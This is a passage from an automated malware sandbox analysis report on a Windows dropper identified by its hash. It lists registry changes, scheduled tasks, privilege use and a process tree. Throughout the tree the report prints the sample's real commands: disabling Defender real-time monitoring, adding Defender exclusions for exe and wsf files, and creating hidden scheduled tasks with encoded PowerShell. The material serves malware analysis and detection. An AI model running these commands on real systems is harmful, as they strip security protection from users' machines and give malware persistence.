Settings\Wpad\{2DD12419-103E-4402-B4F1-DD13988B9FCB}\WpadDecisionTime = e05daeebe3e9da01 mAxzPSG.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\16-c3-d7-1e-96-b0 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 003864c3e3e9da01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2DD12419-103E-4402-B4F1-DD13988B9FCB} mAxzPSG.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0027000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\16-c3-d7-1e-96-b0\WpadDecision = "0" mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs mAxzPSG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\16-c3-d7-1e-96-b0\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rZHgSAw.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\16-c3-d7-1e-96-b0\WpadDecisionReason = "1" mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2DD12419-103E-4402-B4F1-DD13988B9FCB}\16-c3-d7-1e-96-b0 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1680 schtasks.exe 2736 schtasks.exe 824 schtasks.exe 928 schtasks.exe 1616 schtasks.exe 1872 schtasks.exe 2600 schtasks.exe 2144 schtasks.exe 920 schtasks.exe 1728 schtasks.exe 1100 schtasks.exe 2432 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 39 IoCs
pid Process 2884 powershell.exe 2884 powershell.exe 2884 powershell.exe 2036 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 340 powershell.EXE 340 powershell.EXE 340 powershell.EXE 1652 powershell.EXE 1652 powershell.EXE 1652 powershell.EXE 1324 powershell.exe 660 powershell.EXE 660 powershell.EXE 660 powershell.EXE 928 powershell.exe 928 powershell.exe 928 powershell.exe 1620 mAxzPSG.exe 1620 mAxzPSG.exe 1620 mAxzPSG.exe 1620 mAxzPSG.exe 1620 mAxzPSG.exe 1620 mAxzPSG.exe 1620 mAxzPSG.exe 1620 mAxzPSG.exe 820 powershell.exe 2772 powershell.exe 1620 mAxzPSG.exe 1620 mAxzPSG.exe 1620 mAxzPSG.exe 1620 mAxzPSG.exe 1620 mAxzPSG.exe 1620 mAxzPSG.exe 1620 mAxzPSG.exe 1620 mAxzPSG.exe 1620 mAxzPSG.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2884 powershell.exe Token: SeDebugPrivilege 2036 powershell.exe Token: SeIncreaseQuotaPrivilege 1116 WMIC.exe Token: SeSecurityPrivilege 1116 WMIC.exe Token: SeTakeOwnershipPrivilege 1116 WMIC.exe Token: SeLoadDriverPrivilege 1116 WMIC.exe Token: SeSystemProfilePrivilege 1116 WMIC.exe Token: SeSystemtimePrivilege 1116 WMIC.exe Token: SeProfSingleProcessPrivilege 1116 WMIC.exe Token: SeIncBasePriorityPrivilege 1116 WMIC.exe Token: SeCreatePagefilePrivilege 1116 WMIC.exe Token: SeBackupPrivilege 1116 WMIC.exe Token: SeRestorePrivilege 1116 WMIC.exe Token: SeShutdownPrivilege 1116 WMIC.exe Token: SeDebugPrivilege 1116 WMIC.exe Token: SeSystemEnvironmentPrivilege 1116 WMIC.exe Token: SeRemoteShutdownPrivilege 1116 WMIC.exe Token: SeUndockPrivilege 1116 WMIC.exe Token: SeManageVolumePrivilege 1116 WMIC.exe Token: 33 1116 WMIC.exe Token: 34 1116 WMIC.exe Token: 35 1116 WMIC.exe Token: SeDebugPrivilege 2104 powershell.exe Token: SeDebugPrivilege 340 powershell.EXE Token: SeDebugPrivilege 1652 powershell.EXE Token: SeDebugPrivilege 1324 powershell.exe Token: SeAssignPrimaryTokenPrivilege 3040 WMIC.exe Token: SeIncreaseQuotaPrivilege 3040 WMIC.exe Token: SeSecurityPrivilege 3040 WMIC.exe Token: SeTakeOwnershipPrivilege 3040 WMIC.exe Token: SeLoadDriverPrivilege 3040 WMIC.exe Token: SeSystemtimePrivilege 3040 WMIC.exe Token: SeBackupPrivilege 3040 WMIC.exe Token: SeRestorePrivilege 3040 WMIC.exe Token: SeShutdownPrivilege 3040 WMIC.exe Token: SeSystemEnvironmentPrivilege 3040 WMIC.exe Token: SeUndockPrivilege 3040 WMIC.exe Token: SeManageVolumePrivilege 3040 WMIC.exe Token: SeDebugPrivilege 660 powershell.EXE Token: SeDebugPrivilege 928 powershell.exe Token: SeDebugPrivilege 820 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2176 WMIC.exe Token: SeIncreaseQuotaPrivilege 2176 WMIC.exe Token: SeSecurityPrivilege 2176 WMIC.exe Token: SeTakeOwnershipPrivilege 2176 WMIC.exe Token: SeLoadDriverPrivilege 2176 WMIC.exe Token: SeSystemtimePrivilege 2176 WMIC.exe Token: SeBackupPrivilege 2176 WMIC.exe Token: SeRestorePrivilege 2176 WMIC.exe Token: SeShutdownPrivilege 2176 WMIC.exe Token: SeSystemEnvironmentPrivilege 2176 WMIC.exe Token: SeUndockPrivilege 2176 WMIC.exe Token: SeManageVolumePrivilege 2176 WMIC.exe Token: SeDebugPrivilege 2772 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2880 WMIC.exe Token: SeIncreaseQuotaPrivilege 2880 WMIC.exe Token: SeSecurityPrivilege 2880 WMIC.exe Token: SeTakeOwnershipPrivilege 2880 WMIC.exe Token: SeLoadDriverPrivilege 2880 WMIC.exe Token: SeSystemtimePrivilege 2880 WMIC.exe Token: SeBackupPrivilege 2880 WMIC.exe Token: SeRestorePrivilege 2880 WMIC.exe Token: SeShutdownPrivilege 2880 WMIC.exe Token: SeSystemEnvironmentPrivilege 2880 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3056 wrote to memory of 2188 3056 634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56.exe 30 PID 3056 wrote to memory of 2188 3056 634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56.exe 30 PID 3056 wrote to memory of 2188 3056 634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56.exe 30 PID 3056 wrote to memory of 2188 3056 634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56.exe 30 PID 3056 wrote to memory of 2188 3056 634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56.exe 30 PID 3056 wrote to memory of 2188 3056 634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56.exe 30 PID 3056 wrote to memory of 2188 3056 634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56.exe 30 PID 2188 wrote to memory of 1784 2188 Install.exe 31 PID 2188 wrote to memory of 1784 2188 Install.exe 31 PID 2188 wrote to memory of 1784 2188 Install.exe 31 PID 2188 wrote to memory of 1784 2188 Install.exe 31 PID 2188 wrote to memory of 1784 2188 Install.exe 31 PID 2188 wrote to memory of 1784 2188 Install.exe 31 PID 2188 wrote to memory of 1784 2188 Install.exe 31 PID 1784 wrote to memory of 2940 1784 Install.exe 32 PID 1784 wrote to memory of 2940 1784 Install.exe 32 PID 1784 wrote to memory of 2940 1784 Install.exe 32 PID 1784 wrote to memory of 2940 1784 Install.exe 32 PID 1784 wrote to memory of 2940 1784 Install.exe 32 PID 1784 wrote to memory of 2940 1784 Install.exe 32 PID 1784 wrote to memory of 2940 1784 Install.exe 32 PID 2940 wrote to memory of 2784 2940 cmd.exe 34 PID 2940 wrote to memory of 2784 2940 cmd.exe 34 PID 2940 wrote to memory of 2784 2940 cmd.exe 34 PID 2940 wrote to memory of 2784 2940 cmd.exe 34 PID 2940 wrote to memory of 2784 2940 cmd.exe 34 PID 2940 wrote to memory of 2784 2940 cmd.exe 34 PID 2940 wrote to memory of 2784 2940 cmd.exe 34 PID 2784 wrote to memory of 2680 2784 forfiles.exe 35 PID 2784 wrote to memory of 2680 2784 forfiles.exe 35 PID 2784 wrote to memory of 2680 2784 forfiles.exe 35 PID 2784 wrote to memory of 2680 2784 forfiles.exe 35 PID 2784 wrote to memory of 2680 2784 forfiles.exe 35 PID 2784 wrote to memory of 2680 2784 forfiles.exe 35 PID 2784 wrote to memory of 2680 2784 forfiles.exe 35 PID 2680 wrote to memory of 296 2680 cmd.exe 36 PID 2680 wrote to memory of 296 2680 cmd.exe 36 PID 2680 wrote to memory of 296 2680 cmd.exe 36 PID 2680 wrote to memory of 296 2680 cmd.exe 36 PID 2680 wrote to memory of 296 2680 cmd.exe 36 PID 2680 wrote to memory of 296 2680 cmd.exe 36 PID 2680 wrote to memory of 296 2680 cmd.exe 36 PID 2940 wrote to memory of 2712 2940 cmd.exe 37 PID 2940 wrote to memory of 2712 2940 cmd.exe 37 PID 2940 wrote to memory of 2712 2940 cmd.exe 37 PID 2940 wrote to memory of 2712 2940 cmd.exe 37 PID 2940 wrote to memory of 2712 2940 cmd.exe 37 PID 2940 wrote to memory of 2712 2940 cmd.exe 37 PID 2940 wrote to memory of 2712 2940 cmd.exe 37 PID 2712 wrote to memory of 2772 2712 forfiles.exe 38 PID 2712 wrote to memory of 2772 2712 forfiles.exe 38 PID 2712 wrote to memory of 2772 2712 forfiles.exe 38 PID 2712 wrote to memory of 2772 2712 forfiles.exe 38 PID 2712 wrote to memory of 2772 2712 forfiles.exe 38 PID 2712 wrote to memory of 2772 2712 forfiles.exe 38 PID 2712 wrote to memory of 2772 2712 forfiles.exe 38 PID 2772 wrote to memory of 2832 2772 cmd.exe 39 PID 2772 wrote to memory of 2832 2772 cmd.exe 39 PID 2772 wrote to memory of 2832 2772 cmd.exe 39 PID 2772 wrote to memory of 2832 2772 cmd.exe 39 PID 2772 wrote to memory of 2832 2772 cmd.exe 39 PID 2772 wrote to memory of 2832 2772 cmd.exe 39 PID 2772 wrote to memory of 2832 2772 cmd.exe 39 PID 2940 wrote to memory of 2320 2940 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56.exe"C:\Users\Admin\AppData\Local\Temp\634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Users\Admin\AppData\Local\Temp\7zSCF12.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Users\Admin\AppData\Local\Temp\7zSD105.tmp\Install.exe.\Install.exe /TWZIzdidDdU "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"5⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2680 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:296
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"5⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2772 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:2832
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"5⤵
- Indirect Command Execution
PID:2320 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2364
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵
- System Location Discovery: System Language Discovery
PID:2180
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"5⤵
- Indirect Command Execution
PID:2232 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2472
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵
- System Location Discovery: System Language Discovery
PID:2448
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2864 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵PID:2808
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2884 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force8⤵PID:2656
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1352 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵PID:944
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2036 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1116
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bQeBRIfYCApeQZGKek" /SC once /ST 22:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc\TGxOdjVHuAohYJs\rZHgSAw.exe\" 4e /ztzDdidpucJ 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2144
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 5084⤵
- Loads dropped DLL
- Program crash
PID:2908
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {9EF94694-B88B-400A-B2E3-FF15838FDD20} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2996
-
C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc\TGxOdjVHuAohYJs\rZHgSAw.exeC:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc\TGxOdjVHuAohYJs\rZHgSAw.exe 4e /ztzDdidpucJ 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1516 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:2160
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1976 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2340
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:2092
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
PID:1728 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:1624
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:1308
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
PID:1560 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:1648
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:1812
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1660 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1828
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
PID:3060
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1672 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:2148
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2104 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:2300
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRdMakNMU" /SC once /ST 00:59:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRdMakNMU"3⤵
- System Location Discovery: System Language Discovery
PID:876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRdMakNMU"3⤵PID:2740
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:992
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1676
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1472
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1788
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRfVcomiq" /SC once /ST 20:03:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:1680
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRfVcomiq"3⤵
- System Location Discovery: System Language Discovery
PID:2560
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRfVcomiq"3⤵
- System Location Discovery: System Language Discovery
PID:2912
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2372 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:2828
-
